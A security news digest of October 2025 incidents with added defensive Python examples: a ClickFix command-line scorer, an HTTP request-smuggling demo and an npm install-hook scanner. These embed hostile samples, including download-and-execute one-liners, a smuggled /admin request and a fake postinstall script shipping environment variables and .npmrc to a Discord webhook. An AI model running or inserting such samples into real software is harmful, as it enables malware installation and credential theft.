Author: AresISEC Security Team

Security Highlights Of The Day [21/10/25]

TikTok Videos Continue to Push Infostealers in ClickFix Attacks

Cybercriminals are using TikTok videos disguised as free activation guides for popular software (Windows, Spotify, Netflix, Microsoft 365, Adobe, CapCut Pro, Discord Nitro and others) to spread information-stealing malware. The videos stage ClickFix attacks: social-engineering "fixes" that talk viewers into pasting and running a PowerShell command or other script that installs an infostealer on their own machine.

Source: BleepingComputer

Google Ads for Fake Homebrew, LogMeIn Sites Push Infostealers

A malicious campaign targets macOS developers with fake Homebrew, LogMeIn and TradingView sites promoted through Google Ads, delivering infostealers such as AMOS (Atomic macOS Stealer) and Odyssey. The sites use ClickFix techniques to get targets to paste a command into Terminal, so the victims install the malware themselves.

Source: BleepingComputer
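Both ClickFix items above reduce to the same observable: a user types or pastes a download-and-execute command into the Windows Run dialog or a macOS Terminal. The Python triage heuristic below is an added example, not code from BleepingComputer or either reporting team; it scores constructed process-creation events (parent image, image, command line) on that shape. The sample events, the hostnames under example.invalid, the ALLOWED_HOSTS allow-list and the threshold are all assumptions for the example and would be tuned against real telemetry.

```python
import re
from urllib.parse import urlparse

# Hosts this (hypothetical) organisation trusts for curl-pipe-shell installers.
# Assumption for the example: in practice the list is managed centrally.
ALLOWED_HOSTS = {"raw.githubusercontent.com", "github.com"}

# Constructed process-creation events, not real telemetry:
# (parent_image, image, command_line).
SAMPLE_EVENTS = [
    # Windows: "fix" pasted into the Run dialog, so explorer.exe is the parent.
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -ep bypass -c "iwr http://cdn.example.invalid/act.ps1 | iex"'),
    ("explorer.exe", "mshta.exe", "mshta https://verify.example.invalid/fix.hta"),
    # Windows: developer runs a build script from an editor (benign).
    ("code.exe", "powershell.exe", r"powershell -File .\build.ps1"),
    # macOS: one-liner copied from a fake installer page into Terminal.
    ("Terminal", "bash",
     'bash -c "$(curl -fsSL https://brew.example.invalid/install.sh)"'),
    # macOS: same shape, but the script comes from an allow-listed host.
    ("Terminal", "bash",
     'bash -c "$(curl -fsSL https://raw.githubusercontent.com/example/tool/HEAD/install.sh)"'),
]

INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh"}

# Download-and-execute shapes: a PowerShell web cmdlet piped to iex, curl piped
# to a shell, curl inside command substitution, or mshta handed a URL.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b.*\|\s*(?:iex|Invoke-Expression)\b"
    r"|\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b"
    r"|\$\(\s*curl\b"
    r"|\bmshta(?:\.exe)?\s+https?://",
    re.IGNORECASE,
)
# Flags that hide the window or relax policy, common in pasted PowerShell lures.
EVASION_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-(?:ep|executionpolicy)\s+bypass|-enc(?:odedcommand)?\b|-nop\b",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s\"'|)]+", re.IGNORECASE)


def score_event(parent, image, cmdline):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if parent.lower() in INTERACTIVE_PARENTS and image.lower() in INTERPRETERS:
        score += 2
        reasons.append("interpreter launched from an interactive parent")
    if DOWNLOAD_EXEC.search(cmdline):
        score += 3
        reasons.append("download-and-execute pattern")
    if EVASION_FLAGS.search(cmdline):
        score += 1
        reasons.append("window-hiding or policy-bypass flags")
    hosts = {urlparse(u).hostname or "" for u in URL.findall(cmdline)}
    unknown = sorted(h for h in hosts if h not in ALLOWED_HOSTS)
    if unknown:
        score += 2
        reasons.append("fetches from non-allow-listed host(s): " + ", ".join(unknown))
    return score, reasons


def flag_clickfix(events, threshold=6):
    """Return the events whose score reaches the threshold, highest score first."""
    hits = []
    for parent, image, cmdline in events:
        score, reasons = score_event(parent, image, cmdline)
        if score >= threshold:
            hits.append({"parent": parent, "image": image, "cmdline": cmdline,
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in flag_clickfix(SAMPLE_EVENTS):
        print(hit["score"], hit["image"], "|", "; ".join(hit["reasons"]))
```

The caveat this makes visible: a genuine installer one-liner and a fake one from a lookalike site have the same syntax, so the decisive signal is the host the script is fetched from, not the command shape. The last two sample events differ only in that host, and only the non-allow-listed one crosses the threshold.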

131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

Researchers uncovered a coordinated campaign using 131 rebranded clones of a WhatsApp Web automation Chrome extension to spam Brazilian users at scale. The extensions share code, design patterns and infrastructure, have a combined 20,905 active users, and automate bulk outreach in a way that sidesteps WhatsApp's anti-spam controls.

Source: TheHackerNews

Amazon’s AWS Recovering After Major Outage Disrupts Apps, Services Worldwide

Amazon Web Services reported recovery after a widespread outage that knocked out thousands of websites and disrupted major apps (including Snapchat and Reddit), causing global service interruptions. Systems began returning online after roughly three hours, with AWS reporting significant signs of recovery while working through a backlog of queued requests.

Source: Reuters

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack

Researchers attributed an intrusion to the China-based group Salt Typhoon (also tracked as Earth Estries, GhostEmperor and UNC2286), which exploited a Citrix NetScaler Gateway vulnerability and relied on DLL sideloading and zero-day techniques to infiltrate systems. The group has targeted critical sectors (telecom, energy, government) across more than 80 countries, using advanced tradecraft to evade detection.

Source: Infosecurity Magazine

Security Highlights Of The Day [20/10/25]

Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities

On Oct. 15, 2025, F5 disclosed a long-term compromise of their corporate networks in which a nation-state actor exfiltrated files from BIG-IP product development and engineering knowledge platforms, including some source code and information about undisclosed vulnerabilities. F5 stated it has no evidence of active exploitation of undisclosed critical or remote code vulnerabilities and found no indication of access to CRM, financial, support case management, or iHealth systems; some exfiltrated files contained configuration or implementation information for a small percentage of customers.

Source: Unit42 (Palo Alto Networks)

Over 266,000 F5 BIG-IP Instances Exposed to Remote Attacks

Shadowserver Foundation found more than 266,000 F5 BIG-IP instances exposed online following F5’s disclosure of a network breach and stolen source code. F5 released patches addressing 44 vulnerabilities (including ones referenced in the incident) and urged customers to update BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients immediately, while noting there is no current knowledge of undisclosed critical remote code execution vulnerabilities being exploited.

Source: BleepingComputer

Microsoft Revokes 200 Fraudulent Certificates Used in Rhysida Ransomware Campaign

Microsoft revoked more than 200 certificates used by an actor tracked as Vanilla Tempest to fraudulently sign malicious binaries distributed in fake Teams setup files that delivered the Oyster backdoor and deployed Rhysida ransomware. The activity was detected in late September 2025 and disrupted earlier in October; Microsoft updated security solutions to flag signatures associated with the fake setup files, the Oyster backdoor, and Rhysida ransomware.

Source: TheHackerNews

Researchers Uncover WatchGuard VPN Bug That Could Let Attackers Take Over Devices

A critical out-of-bounds write vulnerability in WatchGuard Fireware OS, tracked as CVE-2025-9242 (CVSS 9.3), affects multiple Fireware OS versions and could allow unauthenticated remote attackers to execute arbitrary code on perimeter appliances. watchTowr Labs notes that the flaw has the characteristics ransomware groups look for (an internet-exposed service, exploitable without authentication), and WatchGuard has published advisories and patches.

Source: TheHackerNews

‘Highest Ever’ Severity Score Assigned by Microsoft to ASP.NET Core Vulnerability

Microsoft assigned a CVSS score of 9.9 to an HTTP request smuggling vulnerability in Kestrel (ASP.NET Core’s web server), tracked as CVE-2025-55315—the highest severity score assigned by Microsoft to date. The flaw could allow an attacker to smuggle an HTTP request inside another request to bypass front-end security controls or hijack user credentials, prompting urgent mitigation and updates.

Source: SecurityWeek
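The vulnerability class in the Kestrel advisory arises when two parsers on the same request path frame one message differently. The Python example below is added here and is not from SecurityWeek or Microsoft, and it does not reproduce CVE-2025-55315 itself; it shows the generic CL.TE desync on a constructed byte stream: a front end that trusts Content-Length forwards a single request, while a back end that honours Transfer-Encoding sees two, the second of which the attacker wrote. The "strict" mode shows the usual hardening, rejecting any message that carries both framing headers. The hostname and paths are constructed.

```python
from typing import Dict, List, Tuple

CRLF = b"\r\n"


def _parse_head(head: bytes) -> Dict:
    """Parse a request line plus headers (header names lower-cased)."""
    lines = head.split(CRLF)
    method, target, version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("ascii").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def _read_chunked(buf: bytes, pos: int) -> Tuple[bytes, int]:
    """Read a chunked body starting at pos. Assumes no trailer fields."""
    body = b""
    while True:
        eol = buf.index(CRLF, pos)
        size = int(buf[pos:eol].split(b";")[0].decode("ascii"), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return body, buf.index(CRLF, pos) + 2  # skip the empty trailer section
        body += buf[pos:pos + size]
        pos += size + 2  # chunk data plus its CRLF


def parse_stream(raw: bytes, mode: str) -> List[Dict]:
    """Split one TCP stream into HTTP/1.1 requests under a given framing policy.

    mode="cl":     trust Content-Length and ignore Transfer-Encoding (a lenient
                   parser that does not apply the RFC 9112 precedence rule).
    mode="te":     prefer Transfer-Encoding: chunked, as RFC 9112 section 6.3 requires.
    mode="strict": reject any message that carries both headers.
    """
    reqs, pos = [], 0
    while pos < len(raw):
        end = raw.index(CRLF + CRLF, pos)
        req = _parse_head(raw[pos:end])
        pos = end + 4
        h = req["headers"]
        chunked = h.get("transfer-encoding", "").lower() == "chunked"
        length = h.get("content-length")
        if mode == "strict" and chunked and length is not None:
            raise ValueError("ambiguous framing: Transfer-Encoding and Content-Length both present")
        if chunked and mode != "cl":
            req["body"], pos = _read_chunked(raw, pos)
        elif length is not None:
            n = int(length)
            req["body"], pos = raw[pos:pos + n], pos + n
        else:
            req["body"] = b""
        reqs.append(req)
    return reqs


# Constructed CL.TE payload: Content-Length covers the whole body, but a chunked
# parser stops at the zero-size chunk and treats the remainder as a new request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.example.invalid\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
ATTACK_STREAM = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: app.example.invalid\r\n"
    b"Content-Length: " + str(len(BODY)).encode("ascii") + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + BODY
)


def desync_demo() -> Tuple[int, int, str]:
    """Return (front-end request count, back-end request count, target of the last back-end request)."""
    front = parse_stream(ATTACK_STREAM, "cl")
    back = parse_stream(ATTACK_STREAM, "te")
    return len(front), len(back), back[-1]["target"]


def rejects_ambiguous(raw: bytes) -> bool:
    """True if strict framing refuses the stream, which is the hardened behaviour."""
    try:
        parse_stream(raw, "strict")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(desync_demo())                    # (1, 2, '/admin')
    print(rejects_ambiguous(ATTACK_STREAM))  # True
```

The front end authorised one POST to /search; the back end also executed a GET /admin that never passed through the front end's access checks, which is the "bypass front-end security controls" outcome the advisory describes. Real-world variants differ in which ambiguity the two parsers disagree on (header casing, whitespace, bare LF, chunk-size parsing), but the defence is the same: both hops must apply one framing rule and refuse messages that can be framed two ways.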

Security Highlights Of The Day [16/10/25]

Defrosting PolarEdge’s Backdoor

Researchers at Sekoia.io analyzed a botnet dubbed PolarEdge, first detected in January 2025, which exploits CVE-2023-20118 to achieve remote code execution (RCE) and deploy a web shell on Cisco small-business routers. A subsequent attack in February 2025 involved a remote command that installed a TLS-based backdoor implant. The campaign also includes related payloads targeting Asus, QNAP and Synology devices, revealing a broader family of attacks.

Source: Sekoia

Mysterious Elephant: A Growing Threat

Kaspersky GReAT researchers have detailed activity from Mysterious Elephant, an APT group targeting government and foreign affairs organizations in the Asia-Pacific region. Active since 2023, the group adapts its tactics, using WhatsApp exploitation to exfiltrate documents and other sensitive data. Its 2025 campaigns rely on new custom-made and modified open-source tools like BabShell and MemLoader to enhance stealth and effectiveness.

Source: Securelist (Kaspersky)

Operation Zero Disco: Attackers Exploit Cisco SNMP Vulnerability to Deploy Rootkits

Trend Micro discovered an operation exploiting Cisco's SNMP vulnerability (CVE-2025-20352) to deploy Linux rootkits on vulnerable network devices. Attackers used spoofed IP and MAC addresses, and the malware sets a universal password containing the word "disco". Once implanted, it hooks IOSd components in memory, giving it a fileless foothold. Newer Cisco switch models use ASLR for protection, but repeated attempts can still succeed.

Source: TrendMicro

PhantomVAI Loader Delivers a Range of Infostealers

Palo Alto Networks’ Unit 42 team reported phishing campaigns using PhantomVAI Loader to deliver various information-stealing malware through multi-stage infection chains. Originally linked to Katz Stealer, the loader now distributes AsyncRAT, XWorm, FormBook, and DCRat. Sold as malware-as-a-service, PhantomVAI Loader employs steganography and obfuscation to conceal payloads and evade detection.

Source: Unit42 (Palo Alto Networks)

New Android Pixnapping Attack Steals MFA Codes Pixel-By-Pixel

A newly discovered side-channel attack named Pixnapping allows a malicious Android app to capture pixels displayed by other apps or websites and reconstruct sensitive data, including chat messages, emails, and two-factor authentication codes. Developed by researchers from seven U.S. universities, the attack works on fully patched modern Android devices and can steal 2FA codes in under 30 seconds.

Source: BleepingComputer

Security Highlights Of The Day [15/10/25]

New Stealit Campaign Abuses Node.js Single Executable Application

FortiGuard Labs has identified a new and active Stealit malware campaign leveraging Node.js' Single Executable Application (SEA) feature to distribute payloads. The investigation began after a spike in detections of a Visual Basic script that was later confirmed to provide persistence. Unlike earlier Stealit campaigns built with Electron, this version uses Node.js' SEA to bundle scripts and assets into standalone binaries, enabling execution without a pre-installed Node.js runtime.

Source: Fortinet

GhostBat RAT: Inside the Resurgence of RTO-Themed Android Malware

Cyble Research and Intelligence Labs (CRIL) observed a surge in Android malware campaigns disguised as Indian RTO applications. Distributed via WhatsApp messages, SMS, and compromised websites, these fake apps capture banking credentials, UPI PINs, and exfiltrate SMS messages with financial keywords. Some variants even include cryptocurrency mining features. Infected devices are registered through a Telegram bot named GhostBatRat_bot, linking the campaign to the GhostBat RAT malware.

Source: Cyble

When the Monster Bytes: Tracking TA585 and Its Arsenal

Proofpoint researchers have uncovered a new cybercriminal actor, TA585, operating with high sophistication and distributing malware like MonsterV2, a remote access trojan, stealer, and loader. MonsterV2 is sold on hacking forums and used by a small number of actors. TA585 stands out for managing its own infrastructure, delivery, and malware deployment without relying on third-party services or brokers.

Source: Proofpoint

Chinese Hackers Abuse Geo-Mapping Tool for Year-Long Persistence

Chinese state-sponsored hackers remained undetected for over a year by exploiting a component in Esri’s ArcGIS geo-mapping tool, converting it into a web shell. ArcGIS, widely used by municipalities and infrastructure operators, supports server object extensions that extend its functionality. ReliaQuest researchers attribute the attack to a Chinese APT group, likely Flax Typhoon, based on operational similarities.

Source: BleepingComputer

npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels

Researchers have discovered malicious packages across npm, Python, and Ruby ecosystems using Discord as a command-and-control channel. Attackers exploit Discord webhooks to transmit stolen data to actor-controlled channels, as webhooks can post messages without authentication and are write-only, preventing defenders from reviewing prior posts. This approach shifts the economics of supply chain attacks by leveraging widely accessible cloud-based tools.

Source: TheHackerNews
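What makes the webhook technique effective is its placement: an install-time hook runs automatically on every developer machine that pulls the package, and a webhook URL needs no token the defender can revoke from the client side. The Python scanner below is an added example, not code from The Hacker News or the researchers cited; it parses a constructed npm package.json, follows each install lifecycle hook to the package-local file it runs, and grades the hook by whether it both reads secrets and posts to a Discord webhook. The package name, file contents and webhook id are invented, and the webhook URL pattern is the public discord.com/api/webhooks/<id>/<token> shape.

```python
import json
import re

# Discord webhook URLs as they appear in code (canary and ptb subdomains included).
WEBHOOK = re.compile(
    r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I)
# Places install-time code reads secrets from.
SECRET_SOURCES = re.compile(
    r"process\.env|os\.environ|\.npmrc|\.pypirc|\.gem/credentials|\.ssh/|\.aws/credentials|\.git-credentials")
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed package contents (hypothetical name and webhook id), not a real package.
SUSPECT_FILES = {
    "package.json": json.dumps({
        "name": "example-colour-utils",
        "version": "1.0.3",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
    }),
    "setup.js": (
        "const https = require('https'), fs = require('fs'), os = require('os');\n"
        "const loot = { env: process.env,\n"
        "               npmrc: fs.readFileSync(os.homedir() + '/.npmrc', 'utf8') };\n"
        "https.request('https://discord.com/api/webhooks/1234567890/AbCdEf-ghIJ',\n"
        "              { method: 'POST' }).end(JSON.stringify(loot));\n"
    ),
}
# Constructed control case: no install hooks at all.
CLEAN_FILES = {
    "package.json": json.dumps({"name": "example-clean", "version": "2.0.0",
                                "scripts": {"build": "tsc", "test": "jest"}}),
}


def scan_package(files):
    """Return one finding per install-time hook: what it runs and what it touches."""
    findings = []
    scripts = json.loads(files["package.json"]).get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Inspect the hook command plus any package-local file it invokes.
        blob = "\n".join([cmd] + [files[t] for t in cmd.split() if t in files])
        webhooks = WEBHOOK.findall(blob)
        secrets = sorted(set(SECRET_SOURCES.findall(blob)))
        if webhooks and secrets:
            severity = "high"    # secrets read and shipped to a write-only channel
        elif webhooks:
            severity = "medium"  # unexplained outbound webhook at install time
        else:
            severity = "info"    # install hook present; still worth a look
        findings.append({"hook": hook, "command": cmd, "severity": severity,
                         "webhooks": webhooks, "secret_sources": secrets})
    return findings


if __name__ == "__main__":
    for f in scan_package(SUSPECT_FILES):
        print(f["severity"], f["hook"], f["command"], f["secret_sources"], f["webhooks"])
```

In a CI gate the "high" result would block installation; "info" and "medium" results are where most false positives live, since legitimate native modules also use install hooks. The scan is static and follows only direct file references, so a hook that downloads its second stage or hides the URL behind string assembly needs a dynamic check (run the install in a sandbox and watch egress) rather than a regex.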
